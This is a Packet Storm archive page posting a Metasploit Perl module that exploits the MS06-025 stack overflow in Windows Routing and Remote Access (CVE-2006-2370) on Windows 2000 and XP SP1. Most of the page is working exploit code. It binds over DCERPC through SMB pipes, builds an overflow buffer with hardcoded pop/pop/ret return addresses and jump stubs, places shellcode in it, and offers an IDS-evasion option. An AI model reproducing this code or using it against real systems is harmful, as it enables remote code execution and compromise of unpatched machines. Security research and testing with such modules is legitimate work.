exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

MSRRAS-pm.txt

MSRRAS-pm.txt
Posted Jun 26, 2006
Authored by H D Moore, Nicolas Pouvesle | Site metasploit.com

Microsoft RRAS MSO6-025 stack overflow exploit written for Metasploit.

tags | exploit, overflow
SHA-256 | 1ac3a6897535861d739bee991b0370b66b6632632fc19720b291005b3b7b8be7

MSRRAS-pm.txt

Change Mirror Download
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##

package Msf::Exploit::rras_ms06_025;
use base "Msf::Exploit";
use strict;

use Pex::DCERPC;
use Pex::NDR;

my $advanced = {
'FragSize' => [ 256, 'The DCERPC fragment size' ],
'BindEvasion' => [ 0, 'IDS Evasion of the Bind request' ],
'DirectSMB' => [ 0, 'Use direct SMB (445/tcp)' ],
};

my $info = {
'Name' => 'Microsoft RRAS MSO6-025 Stack Overflow',
'Version' => '$Revision: 1.1 $',
'Authors' =>
[
'Nicolas Pouvesle <nicolas.pouvesle [at] gmail.com>',
'H D Moore <hdm [at] metasploit.com>'
],

'Arch' => ['x86'],
'OS' => [ 'win32', 'win2000', 'winxp' ],
'Priv' => 1,

'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' => {
'RHOST' => [ 1, 'ADDR', 'The target address' ],

# SMB connection options
'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''],
'SMBDOM' => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ],
},

'Payload' => {
'Space' => 1104,
'BadChars' => "\x00",
'Keys' => ['+ws2ord'],

# sub esp, 4097 + inc esp makes stack happy
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},

'Description' => Pex::Text::Freeform(
qq{
This module exploits a stack overflow in the Windows Routing and Remote
Access Service. Since the service is hosted inside svchost.exe, a failed
exploit attempt can cause other system services to fail as well. A valid
username and password is required to exploit this flaw on Windows 2000.
When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
}
),

'Refs' =>
[
[ 'BID', '18325' ],
[ 'CVE', '2006-2370' ],
[ 'OSVDB', '26437' ],
[ 'MSB', 'MS06-025' ]
],

'DefaultTarget' => 0,
'Targets' =>
[
[ 'Automatic' ],
[ 'Windows 2000', 0x7571c1e4 ], # pop/pop/ret
[ 'Windows XP SP1', 0x7248d4cc ], # pop/pop/ret
],

'Keys' => ['rras'],

'DisclosureDate' => 'Jun 13 2006',
};

sub new {
my ($class) = @_;
my $self = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
return ($self);
}

sub Exploit {
my ($self) = @_;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];

my $FragSize = $self->GetVar('FragSize') || 256;
my $target = $self->Targets->[$target_idx];

my ( $res, $rpc );

if ( !$self->InitNops(128) ) {
$self->PrintLine("[*] Failed to initialize the nop module.");
return;
}

my $pipe = "\\" . $self->GetVar("SMBPIPE");
my $uuid = '20610036-fa22-11cf-9823-00a0c911e5df';
my $version = '1.0';

my $handle =
Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host,
$pipe );

my $dce = Pex::DCERPC->new(
'handle' => $handle,
'username' => $self->GetVar('SMBUSER'),
'password' => $self->GetVar('SMBPASS'),
'domain' => $self->GetVar('SMBDOM'),
'fragsize' => $self->GetVar('FragSize'),
'bindevasion' => $self->GetVar('BindEvasion'),
'directsmb' => $self->GetVar('DirectSMB'),
);

if ( !$dce ) {
$self->PrintLine("[*] Could not bind to $handle");
return;
}

my $smb = $dce->{'_handles'}{$handle}{'connection'};
if ( $target->[0] =~ /Auto/ ) {
if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
$target = $self->Targets->[1];
$self->PrintLine('[*] Detected a Windows 2000 target...');
}
elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
$target = $self->Targets->[2];
$self->PrintLine('[*] Detected a Windows XP target...');
}
else {
$self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() );
return;
}
}

my $pattern = '';

if ($target->[0] =~ /Windows 2000/) {

$pattern =
pack( 'V', 1 ) .
pack( 'V', 0x49 ) .
$shellcode .
"\xeb\x06" .
Pex::Text::AlphaNumText(2).
pack( 'V', $target->[1] ) .
"\xe9\xb7\xfb\xff\xff" ;

} elsif( $target->[0] =~ /Windows XP/) {

$pattern =
pack( 'V', 1 ) .
pack( 'V', 0x49 ) .
Pex::Text::AlphaNumText(0x4c).
"\xeb\x06" .
Pex::Text::AlphaNumText(2).
pack( 'V', $target->[1] ) .
$shellcode;

} else {
self->PrintLine( '[*] No target available...');
return;
}

# need to produce an exception
my $request = $pattern . Pex::Text::AlphaNumText(0x4000 - length($pattern));

my $len = length ($request);

my $stub =
Pex::NDR::Long( int( 0x20000 ) )
. Pex::NDR::Long( int( $len ) )
. $request
. Pex::NDR::Long( int( $len ) );

$self->PrintLine("[*] Sending request...");
my @response = $dce->request( $handle, 0x0C, $stub );
if (@response) {
$self->PrintLine('[*] RPC server responded with:');
foreach my $line (@response) {
$self->PrintLine( '[*] ' . $line );
}
$self->PrintLine('[*] This probably means that the system is patched');
}
return;
}

1;

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    0 Files
  • 8
    Nov 8th
    0 Files
  • 9
    Nov 9th
    0 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    0 Files
  • 12
    Nov 12th
    0 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close